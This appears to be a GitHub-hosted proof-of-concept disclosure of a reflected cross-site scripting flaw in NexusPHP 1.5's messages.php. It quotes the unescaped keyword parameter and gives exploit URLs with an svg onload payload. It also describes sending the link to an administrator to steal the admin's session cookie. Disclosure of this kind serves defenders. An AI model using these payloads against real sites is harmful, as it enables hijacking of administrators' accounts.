Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Nexusphppoc/xss2.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
36 lines (24 sloc)
1.26 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ########################### | |
| # Powered by C0d3r1iu # | |
| # Team:HIT-nslab # | |
| # mail:admin@recorday.cn # | |
| ########################### | |
| =============================================== | |
| Send the URL to the web administrator to complete the attack,and you can get the administrator's identity | |
| Affected software: NexusPHP 1.5 | |
| Software Link: http://sourceforge.net/projects/nexusphp/ | |
| =============================================== | |
| Source: | |
| messages.php:from line 680 | |
| <input type="hidden" name="action" value="viewmailbox"> | |
| <?php echo $lang_messages['text_search'] ?> | |
| <input id="searchinput" name="keyword" type="text"value="<?php echo $_GET['keyword']?>" style="width: 200px"/> | |
| Affected software: NexusPHP 1.5 | |
| Software Link: http://sourceforge.net/projects/nexusphp/ | |
| Free to modify and redistribute this program. | |
| Use at your own risk and you are responsible for what you are doing. | |
| exploit: | |
| http://localhost/messages.php?keyword="><svg/onload=alert(1)>// | |
| http://localhost/messages.php?keyword="> + anyother html tags included <script> | |
| when the admin view this page,we can get his cookie, by the design of this software,the | |
| cookie never be changed if users hasn't change their password. |